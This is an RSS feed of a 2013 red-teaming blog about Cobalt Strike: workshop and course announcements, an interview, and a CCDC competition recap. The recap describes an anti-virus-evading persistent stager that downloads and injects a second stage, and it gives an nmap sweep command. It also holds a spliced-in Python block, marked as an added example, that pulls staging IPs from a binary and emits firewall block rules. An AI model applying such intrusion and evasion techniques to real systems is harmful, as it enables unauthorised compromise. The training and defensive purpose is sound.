<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Strategic Cyber LLC</title>
	<atom:link href="http://blog.strategiccyber.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.strategiccyber.com</link>
	<description>A blog about Armitage, Cobalt Strike, and Red Teaming</description>
	<lastBuildDate>Tue, 14 May 2013 17:16:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.strategiccyber.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Strategic Cyber LLC</title>
		<link>http://blog.strategiccyber.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.strategiccyber.com/osd.xml" title="Strategic Cyber LLC" />
	<atom:link rel='hub' href='http://blog.strategiccyber.com/?pushpress=hub'/>
		<item>
		<title>Armitage and Cobalt Strike Workshop at HackMiami &#8211; Student README</title>
		<link>http://blog.strategiccyber.com/2013/05/14/armitage-and-cobalt-strike-workshop-at-hackmiami-student-readme/</link>
		<comments>http://blog.strategiccyber.com/2013/05/14/armitage-and-cobalt-strike-workshop-at-hackmiami-student-readme/#comments</comments>
		<pubDate>Tue, 14 May 2013 17:09:48 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=2151</guid>
		<description><![CDATA[Are you attending the Armitage and Cobalt Strike Penetration Testing Lab at HackMiami Conference this weekend? Make sure you read this post: This coming weekend, I am teaching a free 4 hour workshop at the HackMiami Conference in beautiful Miami, FL. I&#8217;m told the venue can hold quite a large number of folks and I&#8217;m planning [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Are you attending the Armitage and Cobalt Strike Penetration Testing Lab at <a href="https://hackmiami.com/">HackMiami Conference</a> this weekend? Make sure you read this post:</p>
<p>This coming weekend, I am teaching a free 4-hour workshop at the HackMiami Conference in beautiful Miami, FL. I&#8217;m told the venue can hold quite a large number of folks, and I&#8217;m planning to bring enough materials for 100 attendees. Unlike other runs of this workshop, there is no pre-registration and no attendee list I can blast this message to. That&#8217;s no problem for me, but there is some information you should know before you show up.</p>
<p>This workshop has a significant lab component. To participate in the labs, you must bring a computer that meets the following requirements:</p>
<ol>
<li>2GB of RAM or greater</li>
<li>12GB of free disk space</li>
<li>The ability to run VMWare Virtual Machines (one of VMWare Player, VMWare Workstation, or VMWare Fusion should be installed)</li>
</ol>
<p>If you bring a system that meets those requirements, I will bring everything else. I will provide you with a DVD containing three virtual machines and a lab sheet. If your modern computer doesn&#8217;t have a DVD player, don&#8217;t sweat it. I will bring a USB DVD drive with me. You&#8217;ll have a chance to copy the needed files to your disk during the setup phase of the workshop. I left my USB DVD drive at another conference, but I promise to buy another one before Friday. :)</p>
<p>During the workshop, I expect that you will use the environment I provide. This means you do not need to worry about setting up Kali Linux or finding that old copy of Windows XP underneath the couch. I have you covered. If you want a preview of the workshop, here&#8217;s a video walk-through of the environment I will provide:</p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='450' height='284' src='http://www.youtube.com/embed/nEa5SJbOTRs?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0'></iframe></span>
<p>During the workshop, we will work through a slightly abridged version of the above labs (but you&#8217;ll have all of them, in case you want to play around later).</p>
<p>If you&#8217;d like to come to the workshop, it&#8217;s at this weekend&#8217;s <a href="https://hackmiami.com/">HackMiami Conference</a>. Attendance at the conference is $125. There is no other fee to attend this workshop. Also, since this is open to all attendees of HackMiami, my workshop is available on a first-come, first-served basis.</p>
<p>The workshop starts at <a href="https://hackmiami.com/oldheadz/">5pm on Saturday in Track 1</a>.</p>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/uncategorized/'>Uncategorized</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rsmudge.wordpress.com/2151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rsmudge.wordpress.com/2151/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.strategiccyber.com&#038;blog=28734211&#038;post=2151&#038;subd=rsmudge&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/05/14/armitage-and-cobalt-strike-workshop-at-hackmiami-student-readme/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>
	</item>
		<item>
		<title>Cobalt Strike on McAfee Audio Parasitics Podcast</title>
		<link>http://blog.strategiccyber.com/2013/05/13/cobalt-strike-on-mcafee-audio-parasitics-podcast/</link>
		<comments>http://blog.strategiccyber.com/2013/05/13/cobalt-strike-on-mcafee-audio-parasitics-podcast/#comments</comments>
		<pubDate>Mon, 13 May 2013 20:01:36 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Interviews]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=2146</guid>
		<description><![CDATA[When I first launched Cobalt Strike, Jim Walter and David Marcus were kind enough to host me on the McAfee Labs Audio Parasitics Podcast. You can hear part I and part II of that original interview if you like. Cobalt Strike is coming up on its one year anniversary on the market. A lot has [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>When I first launched Cobalt Strike, <a href="http://blogs.mcafee.com/author/jim-walter">Jim Walter</a> and <a href="http://blogs.mcafee.com/author/david-marcus">David Marcus</a> were kind enough to host me on the <a href="http://podcasts.mcafee.com/audioparasitics/">McAfee Labs Audio Parasitics Podcast</a>. You can hear <a href="http://podcasts.mcafee.com/audioparasitics/AudioParasitics-Episode129-06-2012.mp3">part I</a> and <a href="http://podcasts.mcafee.com/audioparasitics/AudioParasitics-Episode130-06-2012.mp3">part II</a> of that original interview if you like. Cobalt Strike is coming up on its one-year anniversary on the market. A lot has changed with the tool. It has developed an amazing feature set, providing red teams with capabilities such as the ability to <a href="http://blog.strategiccyber.com/2013/02/12/a-vision-for-distributed-red-team-operations/">conduct distributed operations</a>, <a href="http://www.advancedpentest.com/help-beacon">asynchronous command and control (Beacon)</a>, and improved real-time collaboration.</p>
<p>With this in mind, Jim and David invited me back to demo Cobalt Strike in its current state. We did this entire interview and demonstration over Amazon&#8217;s EC2, attacking parts of my local training lab. Here it is, in all of its glory:</p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='450' height='284' src='http://www.youtube.com/embed/unNMKrKyUyQ?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0'></iframe></span>
]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/05/13/cobalt-strike-on-mcafee-audio-parasitics-podcast/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://podcasts.mcafee.com/audioparasitics/AudioParasitics-Episode129-06-2012.mp3" length="13595046" type="audio/mpeg" />
<enclosure url="http://podcasts.mcafee.com/audioparasitics/AudioParasitics-Episode130-06-2012.mp3" length="14202092" type="audio/mpeg" />
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>
	</item>
		<item>
		<title>Cobalt Strike Updates &#8211; 9 May 13</title>
		<link>http://blog.strategiccyber.com/2013/05/09/cobalt-strike-updates-9-may-13/</link>
		<comments>http://blog.strategiccyber.com/2013/05/09/cobalt-strike-updates-9-may-13/#comments</comments>
		<pubDate>Thu, 09 May 2013 13:00:37 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Cobalt Strike]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=2141</guid>
		<description><![CDATA[This is just a friendly note to say that Cobalt Strike 05.08.13 is now available. This update is mostly bug fixes and performance improvements. I have a very exciting feature in the works, but I&#8217;d like to give it another development cycle before I push it to production. See releasenotes.txt for the full list of [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>This is just a friendly note to say that Cobalt Strike 05.08.13 is now available. This update is mostly bug fixes and performance improvements. I have a very exciting feature in the works, but I&#8217;d like to give it another development cycle before I push it to production. :)</p>
<p>See <a href="http://www.advancedpentest.com/releasenotes.txt">releasenotes.txt</a> for the full list of changes.</p>
<p>Licensed Cobalt Strike users may grab the latest using the <a href="http://www.advancedpentest.com/help-update-cobalt-strike">built-in update</a> program. A <a href="http://www.advancedpentest.com/trial">21-day trial</a> is available too.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/05/09/cobalt-strike-updates-9-may-13/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>
	</item>
		<item>
		<title>Red Team Training at BlackHat USA</title>
		<link>http://blog.strategiccyber.com/2013/05/02/red-team-training-at-blackhat-usa-2/</link>
		<comments>http://blog.strategiccyber.com/2013/05/02/red-team-training-at-blackhat-usa-2/#comments</comments>
		<pubDate>Thu, 02 May 2013 15:35:30 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Red Team]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=2091</guid>
		<description><![CDATA[Before developing Cobalt Strike, I conducted interviews with several penetration testing practitioners. I wanted to dig into their process, the tools they used, the gaps they saw, etc. Three folks from the Veris Group sat down with me for three hours to go over these very questions. It was at this time, I became familiar [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Before developing Cobalt Strike, I conducted interviews with several penetration testing practitioners. I wanted to dig into their process, the tools they used, the gaps they saw, etc. Three folks from the <a href="http://www.verisgroup.com/">Veris Group</a> sat down with me for three hours to go over these very questions. It was at this time that I became familiar with <a href="http://www.verisgroup.com/about-veris-group/leadership/david-mcguire-manager/">David McGuire</a> and <a href="http://www.jasonjfrank.com/">Jason Frank</a>.</p>
<p>Our relationship has evolved to the point where they advise on Cobalt Strike, teach the product, and Veris Group is also a Cobalt Strike customer.</p>
<p>At BlackHat USA, Veris Group will teach two courses: <a href="https://www.blackhat.com/us-13/training/adaptive-penetration-testing.html">Adaptive Penetration Testing</a> and <a href="https://www.blackhat.com/us-13/training/adaptive-red-team-tactics.html">Adaptive Red Team Tactics</a>. These two offerings grew out of their Adaptive Penetration Testing course which they&#8217;ve taught at BlackHat USA the past few years.</p>
<p>Last year, David and Jason approached me and offered to include Cobalt Strike on the DVD they provide to the students of their course. This then evolved into including a lab with Cobalt Strike, which in turn evolved into them opting to use Cobalt Strike as the platform to demonstrate their Adaptive Penetration Testing process.</p>
<p>I have my own course offerings, but my offerings are focused only on my toolset. These courses will give you the foundation to set up a complete red team and penetration testing assessment process using Cobalt Strike and other tools. Their perspective is available once a year at BlackHat USA; I highly recommend that you take advantage of it.</p>
<p><img class="aligncenter size-large wp-image-2128" alt="slide9" src="http://rsmudge.files.wordpress.com/2013/05/slide9.jpg?w=450&#038;h=338" width="450" height="338" /></p>
<p>To give you some more insight into these courses, I&#8217;d like to share an interview I conducted with Jason and David on their BlackHat courses:</p>
<h3>1. How many times have you taught at Black Hat and what made you want to teach there?</h3>
<p><strong>David and Jason:</strong> We’ve had the opportunity to teach the class twice at Black Hat USA and once at Black Hat UAE. Black Hat provides smaller independent trainers like us, who don’t do this full time, with a great venue to reach a broad potential audience. They handle all the logistical work (such as securing a venue, billing and marketing) so we can focus on delivering quality course material that benefits our students. We are very appreciative of the opportunity they give small trainers and the working relationship we’ve been able to establish.</p>
<h3>2. In your words, what are the differences between the Adaptive Penetration Testing and Adaptive Red Team Tactics courses?</h3>
<p><strong>David and Jason: </strong>The focus of <a href="https://www.blackhat.com/us-13/training/adaptive-penetration-testing.html"><strong>Adaptive Penetration Testing (APT)</strong></a> is to provide students with a framework for providing comprehensive assessments with the objective of demonstrating the risk, in terms of business impact, of potential system breaches. The end goal is for students to be able to take the techniques, procedures, and methodologies we have developed through our experience and implement them in their own operational environments. Assessments utilizing the methodology we discuss in APT are targeted to take one to two weeks to execute effectively.</p>
<p><img class="aligncenter size-large wp-image-2131" alt="slide341" src="http://rsmudge.files.wordpress.com/2013/05/slide341.jpg?w=450&#038;h=339" width="450" height="339" /></p>
<p><a href="https://www.blackhat.com/us-13/training/adaptive-red-team-tactics.html"><strong>Adaptive Red Team Tactics (ARTT)</strong></a> is meant as a follow-on to APT and focuses on emulating a more advanced threat. This course covers more advanced tactics, techniques and procedures (TTPs) that enable our students to provide a more realistic assessment of defense, detection, and response capabilities in organizations with mature IT security programs. Red Team assessments generally have an extended assessment window and incorporate techniques for providing a more covert, “low and slow,” assessment with a heavy focus on intelligence gathering and long-term post-exploitation activities. Stealth, evasion, robust persistence, and data exfiltration are some of the main themes of ARTT.</p>
<p><img class="aligncenter" alt="slide550" src="http://rsmudge.files.wordpress.com/2013/05/slide550.jpg?w=450&#038;h=336" width="450" height="336" /></p>
<h3>3. What is the secret sauce of your courses? What will you teach that students can&#8217;t get elsewhere?</h3>
<p><strong>David and Jason:</strong> We focus heavily on the tools, techniques and methodologies that we have developed through our experience performing assessments and building internal penetration testing programs for our customers. While we thought there was some really great training out there, we felt there was an opportunity for us to fill a legitimate need in the industry by offering training that focuses on how to effectively conduct assessments in operational environments. In our courses, we want to make sure students understand the entire process of executing a Penetration Test or Red Team assessment, including everything from scoping to exploiting systems to delivering a comprehensive report. We structure and deliver our course material so students walk away from the course with something they can easily use as a reference when conducting their own assessments. We also include templates and other material that offer students a foundation for creating a program/service from the ground up.</p>
<p><a href="http://rsmudge.files.wordpress.com/2013/05/slide69.jpg"><img class="size-large wp-image-2120 aligncenter" alt="slide69" src="http://rsmudge.files.wordpress.com/2013/05/slide69.jpg?w=450&#038;h=338" width="450" height="338" /></a></p>
<p>We think another big differentiator in our courses is our incorporation of Cobalt Strike. We feel that one of the gaps in a lot of training out there is that they do not effectively cover the professional tools that can assist in delivering efficient, effective, and repeatable assessments. Cobalt Strike is a full-fledged toolset we use every day in our penetration tests and red team assessments. It enables us to save a lot of time in execution and have quick access to some powerful capabilities. We believe that when testers are in the middle of an assessment, they should be able to focus on assessing the risk/business impact of breaches for their customer, not wrestling with their tools. Tools don’t make the tester, but knowing which tools can best augment your capabilities is often as important as knowledge of great penetration testing techniques.</p>
<p><strong>Raphael: </strong>*cough* *cough* Last year, I spent some time with David and Jason at the Veris Group headquarters. Jason constantly rolled his eyes at David and me. Apparently, when we sit down together, we&#8217;re like two Furbies going into an infinite loop. Once we broke out of our chat routine, I sat down to go through their labs. I couldn&#8217;t do them. David and Jason kept providing hints, but I really did not know. The labs were related to lateral movement and abusing trust relationships. This is a topic that I don&#8217;t feel is well covered in other places, and their courses both address this topic with a lot of depth.</p>
<p><img class="size-large wp-image-2122 aligncenter" alt="slide476" src="http://rsmudge.files.wordpress.com/2013/05/slide476.jpg?w=450&#038;h=338" width="450" height="338" /></p>
<h3>4. Why isn&#8217;t this material taught in other places?</h3>
<p><strong>David and Jason: </strong>Many courses seem to focus either on foundational knowledge of penetration testing, or technical intricacies of various advanced techniques. While a lot of these are really great courses, we felt they often didn’t leave students with the ability to go execute well-planned and comprehensive assessments on their own. <em><span style="text-decoration:underline;">We designed APT for students who don’t need more foundational knowledge, but do need to run effective assessments to add value for their customers.</span></em> Many courses also focus on tools and techniques that are freely available, but operational penetration testing teams use the most effective tools for the job, whether freely available or commercial. We wanted to train on tools and techniques that students would actually use in the field.</p>
<p>When it comes to ARTT, we felt there are few advanced penetration testing courses available, especially relative to the number of courses that teach the fundamentals. Those that are available typically focus on techniques such as exploit development, but few seem to focus on emulating the techniques of the advanced threats that are actually targeting organizations today. <em><span style="text-decoration:underline;">We bring our experience in conducting red team assessments for the Federal government, where the objective is to analyze systems the way an adversary would versus utilizing the latest and greatest esoteric technique.</span></em></p>
<p><img class="aligncenter" alt="slide512" src="http://rsmudge.files.wordpress.com/2013/05/slide512.jpg?w=450&#038;h=339" width="450" height="339" /></p>
<h3>5. How did Cobalt Strike end up in your courses?</h3>
<p><strong>David and Jason: </strong>When we first developed the APT course, we faced the same limitations most courses do, in that many of the tools we were teaching weren’t the ones we actually used on assessments. One of the only tools that came close to something we could use operationally was Armitage. As Cobalt Strike was a natural progression from Armitage, when it was released, we found it was the perfect fit to move to for our primary penetration testing platform. In keeping with our objective of training for operational testing, we also thought this was a great opportunity to showcase the capabilities a professional toolset can provide. We found Raphael had much of the same mindset for penetration testing and training we did and was enthusiastic about assisting us in improving our training offering. Cobalt Strike was exactly what the course intended to provide: a turn-key approach to accomplish common, sometimes tedious, tasks so the assessor can spend more time performing effective threat emulation.</p>
<div id="attachment_2123" class="wp-caption aligncenter" style="width: 460px"><img class="size-large wp-image-2123" alt="Way to sell them on buying Cobalt Strike guys -- Raphael" src="http://rsmudge.files.wordpress.com/2013/05/slide448.jpg?w=450&#038;h=337" width="450" height="337" /><p class="wp-caption-text">Way to sell them on buying Cobalt Strike guys &#8212; Raphael</p></div>
<p>Cobalt Strike was actually one of the primary reasons we were able to offer the ARTT course this year. One of the significant barriers to teaching (and conducting) red team assessments is the specialized toolsets red teams use. These toolsets are generally highly specialized, require a significant amount of support, and are almost never released. These issues make training red team tactics much more difficult. However, over the past year Raphael added <a href="http://www.advancedpentest.com/help-armitage-vs-cobaltstrike">many red team capabilities</a> to Cobalt Strike. While Cobalt Strike is great for enabling a standard penetration testing team to emulate more advanced threats, it also gave us the opportunity to train on many of the more advanced tactics we use in our red team assessments.</p>
<p><strong>Raphael:</strong> I know the real story. A few years ago, David and Jason were teaching Adaptive Penetration Testing. One of their students used Armitage to chew through their entire exercise environment like it was nothing (this is a very common Armitage story&#8211;in many classrooms). This is what got their attention, and it&#8217;s part of what got us talking in the first place. :)</p>
<h3>6. Who should take your courses?</h3>
<p><strong>David and Jason:</strong></p>
<ul>
<li>Penetration testers and/or managers with prior knowledge/training/experience who are looking to maximize their programs</li>
<li>Individuals interested in starting a penetration testing capability</li>
<li>Penetration testers and/or managers with prior knowledge and experience with penetration testing tools and techniques interested in emulating a more sophisticated threat capability</li>
<li>Individuals who would like a better understanding of the tactics, techniques and procedures of more advanced adversaries</li>
</ul>
<p><strong>Raphael:</strong> If you&#8217;re a prospective (or active) Cobalt Strike user, I highly recommend signing up for one of these courses. If you&#8217;re planning to use Cobalt Strike in a variety of engagements, take <a href="https://www.blackhat.com/us-13/training/adaptive-penetration-testing.html">Adaptive Penetration Testing</a>. If you&#8217;re primarily focused on threat emulation and red teaming, take <a href="https://www.blackhat.com/us-13/training/adaptive-red-team-tactics.html">Adaptive Red Team Tactics</a>. David and Jason are very experienced in the subject matter they&#8217;re teaching. They know Cobalt Strike and we view threat emulation and penetration testing through the same lens.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/05/02/red-team-training-at-blackhat-usa-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide9.jpg?w=450" medium="image">
			<media:title type="html">slide9</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide341.jpg?w=450" medium="image">
			<media:title type="html">slide341</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide550.jpg?w=450" medium="image">
			<media:title type="html">slide550</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide69.jpg?w=450" medium="image">
			<media:title type="html">slide69</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide476.jpg?w=450" medium="image">
			<media:title type="html">slide476</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide512.jpg?w=450" medium="image">
			<media:title type="html">slide512</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/05/slide448.jpg?w=450" medium="image">
			<media:title type="html">Way to sell them on buying Cobalt Strike guys -- Raphael</media:title>
		</media:content>
	</item>
		<item>
		<title>National CCDC Red Team &#8211; Fair and Balanced</title>
		<link>http://blog.strategiccyber.com/2013/04/24/national-ccdc-red-team-fair-and-balanced/</link>
		<comments>http://blog.strategiccyber.com/2013/04/24/national-ccdc-red-team-fair-and-balanced/#comments</comments>
		<pubDate>Wed, 24 Apr 2013 14:27:05 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Red Team]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=2045</guid>
		<description><![CDATA[Saturday, 6:30pm ended my 2013 red teaming season. I&#8217;ve participated in the Collegiate Cyber Defense Competition as a red team volunteer since 2008. I love these events primarily because of the opportunity I get to interact with the student teams and learn from my peers in this field. But, since 2011, I&#8217;ve also traveled to [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Saturday, 6:30pm ended my 2013 red teaming season. I&#8217;ve participated in the <a href="http://www.nationalccdc.org">Collegiate Cyber Defense Competition</a> as a red team volunteer since 2008. I love these events primarily because of the opportunity I get to interact with the student teams and learn from my peers in this field. But, since 2011, I&#8217;ve also traveled to these events with an agenda of exercising my tools, testing improvements, and getting new ideas.</p>
<p>2013 was the first year I had an opportunity to exercise <a href="http://www.advancedpentest.com">Cobalt Strike</a> and its capabilities at these events. CCDC exercises don&#8217;t offer a client-side attack surface, which takes some Cobalt Strike features out of play. However, its <a href="https://www.usenix.org/system/files/login/articles/105484-Mudge.pdf">collaboration capabilities</a>, <a href="http://www.advancedpentest.com/help-scripting-cortana">Cortana scripting</a>, <a href="http://www.advancedpentest.com/help-beacon">Beacon agent</a>, and the ability to <a href="http://blog.strategiccyber.com/2013/02/12/a-vision-for-distributed-red-team-operations/">manage multiple team servers</a> are all very relevant to a CCDC red team.</p>
<p>I wrote about <a href="http://blog.strategiccyber.com/2013/04/01/wrccdc-a-red-team-members-perspective/">my experiences</a> at the <a href="http://wrccdc.org/">Western Regional Collegiate Cyber Defense Competition</a>; now I&#8217;d like to share what happened on the National CCDC Red Team.</p>
<p>I showed up to San Antonio, TX exhausted. I spent last week participating in two exercises: the <a href="http://www.maccdc.org/">Mid Atlantic CCDC event</a> and another grueling (but very challenging and fun) exercise. Once I got to San Antonio, I had dinner with my fellow red team members and crashed out. I made it to the red team room at about 9:15am, approximately 45 minutes before go time.</p>
<p>This was my second year on the National CCDC Red Team. The National CCDC Red Team operates differently from the regionals. Where regionals are generally a free for all, the National team assigns two red team members to each blue team. We&#8217;re allowed to perform actions against other teams, but we must focus on our assigned team first, and we must not disrupt or step on the red team members who own that particular blue team.</p>
<p>When I described this model to my girlfriend, she immediately objected and stated&#8211;&#8221;that&#8217;s not fair! what happens if one team gets less skilled people assigned to them&#8221;. Hear me out, this model can work, and during the 2013 National CCDC&#8211;we provided the fairest and most balanced red experience I&#8217;ve seen at a CCDC event yet.</p>
<h3>Preparation</h3>
<p>I spent the 45 minutes before the event getting my initial attack kit prepped. One role I usually fill at CCDC events is the role of initial exploitation and persistence. The Red Team was assigned several IP address ranges. Our team captain, <a href="http://hackingexposedcomputerforensicsblog.blogspot.com/">David Cowen</a>, parceled them out by assigning each red team member a range of last-octet values they could bind within each of the address ranges.</p>
<p>Once I knew my addresses, I loaded a Cortana script that allows me to generate my persistence artifacts with the appropriate addresses. At CCDC, student teams are allowed to install anti-virus. Unfortunately, most artifacts generated by the Metasploit Framework are caught by anti-virus. I didn&#8217;t want to make it that easy to clean us out. So, I opted to write a persistent stager for the CCDC events this year. This stager ships with several addresses embedded in it. Once it runs, it attempts to connect to each of these addresses, one per minute, until it successfully downloads the second stage of my malware and injects it into memory. Because this code is not in use elsewhere, no anti-virus product that I&#8217;d have to worry about at CCDC catches it.</p>
<div id="attachment_2058" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/tliyrhqy.jpeg"><img class="size-large wp-image-2058" alt="Seriously, this won't do you that much good." src="http://rsmudge.files.wordpress.com/2013/04/tliyrhqy.jpeg?w=450&#038;h=360" width="450" height="360" /></a><p class="wp-caption-text">Seriously, this won&#8217;t do you that much good.</p></div>
<p><strong>Pro-tip:</strong> if you found any of my persistence mechanisms and ran <code>strings</code> against it, you would have known my staging addresses and could have blocked them. If you blocked them, you would have blocked my other backdoors that attempted to stage through the same address.</p>
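<p>Here is the check the pro-tip describes, as an added example in Python (not code from the original post or from Cobalt Strike): a <code>strings</code>-style pass over a stager binary that pulls out the embedded IPv4 addresses and renders outbound block rules for them. It assumes the stager stores its callback addresses as printable dotted quads, which is exactly the weakness the pro-tip points at; the artifact bytes are constructed for this example and are not a real artifact from the event.</p>

```python
"""Added example, not code from the original post or from Cobalt Strike.

Recover the staging addresses embedded in a persistence artifact the way a
`strings` pass would, then render outbound block rules for them. Assumption
(the weakness the pro-tip describes): the stager stores its callback
addresses as printable dotted-quad strings. SAMPLE_ARTIFACT is constructed
for this example and is not a real artifact from the event.
"""
import re
from typing import List, Optional, Tuple

MIN_STRING_LEN = 4  # GNU strings' default minimum run length

# Constructed stand-in for a stager binary: non-printable junk with
# callback addresses (one with a port) embedded as plain strings.
SAMPLE_ARTIFACT = (
    b"MZ\x90\x00" + bytes(range(0, 64))
    + b"192.0.2.10\x00"
    + b"\x7fELF" + b"198.51.100.7:4444\x00"
    + b"not-an-ip 999.1.1.1\x00"
    + b"\x00\xff" * 8
    + b"203.0.113.5\x00"
    + b"192.0.2.10\x00"  # repeated address, reported once
)

PRINTABLE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_STRING_LEN)
# Dotted quad with an optional :port; octet range is validated separately.
IPV4 = re.compile(rb"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?(?![\d.])")


def strings(blob: bytes) -> List[bytes]:
    """Runs of printable ASCII at least MIN_STRING_LEN bytes long."""
    return PRINTABLE.findall(blob)


def _valid_ipv4(addr: bytes) -> bool:
    return all(0 <= int(octet) <= 255 for octet in addr.split(b"."))


def staging_addresses(blob: bytes) -> List[Tuple[str, Optional[int]]]:
    """Distinct (address, port) pairs in order of first appearance."""
    found: List[Tuple[str, Optional[int]]] = []
    for run in strings(blob):
        for addr, port in IPV4.findall(run):
            if not _valid_ipv4(addr):
                continue  # e.g. 999.1.1.1 has the shape but not the range
            entry = (addr.decode(), int(port) if port else None)
            if entry not in found:
                found.append(entry)
    return found


def iptables_rules(entries: List[Tuple[str, Optional[int]]]) -> List[str]:
    """Outbound DROP rules, narrowed to the port when the artifact names one."""
    rules = []
    for addr, port in entries:
        rule = f"iptables -A OUTPUT -d {addr}"
        if port is not None:
            rule += f" -p tcp --dport {port}"
        rules.append(rule + " -j DROP")
    return rules


if __name__ == "__main__":
    hits = staging_addresses(SAMPLE_ARTIFACT)
    print("\n".join(iptables_rules(hits)))
```

<p>Blocking every address recovered this way is what cuts off the other backdoors staging through the same hosts; a stager that stored its addresses encoded or computed them at run time would not fall to this pass, which is why the post calls out plain strings as the giveaway.</p>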
<p>Anyway, I generated my artifacts before I even had time to bind all of my IP addresses. I set up a local Cobalt Strike instance for the initial attack and was getting ready to set up a team server when, very suddenly, 10am came and Dave shouted &#8220;go! go! go!&#8221;.</p>
<h3>Opening Salvo</h3>
<p>The first minutes of any CCDC event are critical. As a red cell member, I do not see CCDC as a game of patching, installing firewalls, and thwarting an attacker who is attempting to scan and exploit you. I see CCDC as an intrusion detection and response game. I want the students to work under the assumption that an attacker is present, focus on their operational security, and develop creative ways to dig us out, spot our activity, or disrupt our command and control. Truth is, once they patch and set up a firewall&#8211;if we don&#8217;t have access, we&#8217;re likely not going to get it. Intrusions today start with the end user for a reason&#8211;these other layers of defense stop the easy stuff.</p>
<p>Contrary to popular belief, I no longer script my opening attack. I&#8217;ve moved away from it this year. I found at earlier events that my scripted exploitation would sometimes make assumptions that I would need to correct once I understood reality. The Armitage and Cobalt Strike user interfaces are efficient enough to allow me to think on my feet and simultaneously apply an action against all systems&#8211;very quickly.</p>
<p>I start most CCDC events with a db_nmap sweep. I don&#8217;t care about discovering each open service. I want the low-hanging fruit only. I use <code>nmap -sV -O -T4 --min-hostgroup 96 -p 22,445</code> across all student ranges to discover the easy exploitation opportunities as quickly as possible.</p>
<p>At National CCDC, student teams have two networks: a local network and a cloud network. This year, I opted to go after their local networks first and follow up against their cloud networks second.</p>
